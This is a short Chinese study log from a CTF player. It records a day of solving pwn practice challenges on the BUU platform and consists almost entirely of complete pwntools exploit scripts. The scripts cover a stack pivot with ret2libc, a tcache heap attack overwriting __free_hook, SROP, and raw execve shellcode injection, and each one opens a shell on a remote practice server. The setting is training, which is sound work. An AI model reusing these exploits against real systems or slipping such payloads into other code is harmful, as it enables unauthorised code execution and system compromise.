21 07 28学习总结

21.07.28学习总结

Column: July 28, 2021
Tags: learning experience

11:00-12:00: buu刷题: ciscn_2019_final_3我写的不好, 写成要爆破的了

14:25-16:30: :buu刷题: ciscn_2019_es_7: 和ciscn_2019_s_3一模一样

ciscn_2019_s_9: 写一段汇编就好了

picoctf_2018_shellcode: ret2shellcode, 我傻逼了

actf_2019_babystack: 栈迁移和ret2libc+csu, 稍微复杂点的常规题

后面一直在玩, 我忏悔

actf_2019_babystack

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ACTF_2019_babystack')
sh=remote('node4.buuoj.cn',28442)
elf=ELF('./ACTF_2019_babystack')
#context.log_level='debug'
context.binary=elf
libc=ELF('/home/thu1e/ctf/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
#libc=elf.libc

leave_ret=0x0400a18
pop_rdi=0x0400ad3
pop_rsi_r15=0x0400ad1
csu_2=0x0400AC6
csu_1=0x0400AB0
ret=0x0400709

#gdb.attach(sh, '''b *0x400ad3''')
sh.recv()
sh.sendline(str(0xe0))
sh.recvuntil('at ')
read_in_addr=int(sh.recvuntil('\n').split('\n')[0], 16)
log.success('read in addr: '+hex(read_in_addr))
payload=p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])\
        +p64(csu_2)+p64(0)+p64(0)+p64(1)+p64(elf.got['read'])+p64(0x100)\
        +p64(read_in_addr+0x60)+p64(0)+p64(csu_1)

payload+=p8(0)*(0xd0-len(payload))+p64(read_in_addr-8)+p64(leave_ret)

sh.recv()
sh.send(payload)
sh.recvuntil('Byebye~\n')
leak_addr=u64(sh.recv(6).ljust(8, '\x00'))
libc_base=leak_addr-libc.sym['puts']
log.success('libc base: '+hex(libc_base))
sys_addr=libc_base+libc.sym['system']
bin_sh_addr=libc_base+libc.search('/bin/sh').next()
payload2=p64(ret)*12+p64(pop_rdi)+p64(bin_sh_addr)+p64(sys_addr)+'wwwwwwww'
sh.send(payload2)
sh.interactive()

ciscn_2019_final_3

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ciscn_final_3')
sh=remote('node4.buuoj.cn',29129)
elf=ELF('./ciscn_final_3')
libc=ELF("./libc/libc.so.6")
context.binary=elf
#context.log_level='debug'

def add(idx, size, content='/bin/sh\x00'):
    sh.recv()
    sh.sendline('1')
    sh.sendline(str(idx))
    sh.sendline(str(size))
    sh.send(content)

def remove(idx):
    sh.recv()
    sh.sendline('2')
    sh.recv()
    sh.sendline(str(idx))

add(0, 0x78)
sh.recvuntil('gift :')
heap_addr=int(sh.recvuntil('\n').split('\n')[0], 16)-0xe70
log.success('heap_addr: '+hex(heap_addr))

for i in range(4):
    add(i+1, 0x18)

for i in range(9):
    add(i+5, 0x78)

remove(0)
remove(0)
payload1=p64(heap_addr+0xe70+0x40)
add(14, 0x78, payload1)
add(15, 0x78, payload1)
payload2=p64(0)*7+p64(0x481)
add(16, 0x78, payload2)
remove(1) #unsorted
remove(3) #tc 0x20
add(17, 0x38)
payload3=p16(((libc.sym['__free_hook'])&0xfff)+0xf000)
add(18, 0x38, payload3)
add(19, 0x18)
add(20, 0x18, p64(0))
sh.recvuntil('gift :')
free_hook_addr=int(sh.recvuntil('\n').split('\n')[0], 16)
libc_base=free_hook_addr-libc.sym['__free_hook']
log.success('libc_base: '+hex(libc_base))
add(21, 0x28)
remove(21)
remove(21)
add(22, 0x28, p64(free_hook_addr))
add(23, 0x28)
add(24, 0x28, p64(libc_base+libc.sym['system']))
remove(23)
sh.interactive()

ciscn_2019_es_7

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ciscn_2019_es_7')
sh=remote('node4.buuoj.cn',25041)
elf=ELF('./ciscn_2019_es_7')
context.binary=elf
pause()
payload1='a'*0x10+p64(elf.sym['main'])+p64(elf.sym['main'])
sh.send(payload1)
sh.recv(0x20)
leak_stack=u64(sh.recv(6).ljust(8, '\x00'))
sh.recv()
log.success('leak_stack: '+hex(leak_stack))
read_addr=leak_stack-0x138

frame=SigreturnFrame()
frame.rip=0x400517
frame.rax=59
frame.rdi=read_addr+8
frame.rdx=0
frame.rcx=0
payload2='/bin/sh\x00'*2+p64(0x04004DA)+p64(0x400517)+str(frame)
sh.send(payload2)
sh.interactive()

ciscn_2019_s_9

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ciscn_s_9')
sh=remote('node4.buuoj.cn',25983)
elf=ELF('./ciscn_s_9')
context.binary=elf
context.log_level='debug'

shellcode1='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
shellcode2='''
    sub esp, 0x28;
    jmp esp;
'''
shellcode2=asm(shellcode2)
payload=shellcode1+p8(0)*(9*4-len(shellcode1))+p32(0x8048554)+shellcode2
#gdb.attach(sh)
sh.recv()
sh.sendline(payload)
sh.interactive()

picoctf_2018_shellcode

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./PicoCTF_2018_shellcode')
sh=remote('node4.buuoj.cn',29938)
elf=ELF('./PicoCTF_2018_shellcode')
context.binary=elf
context.log_level='debug'

shellcode2='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload=shellcode2
sh.recv()
sh.sendline(payload)
sh.interactive()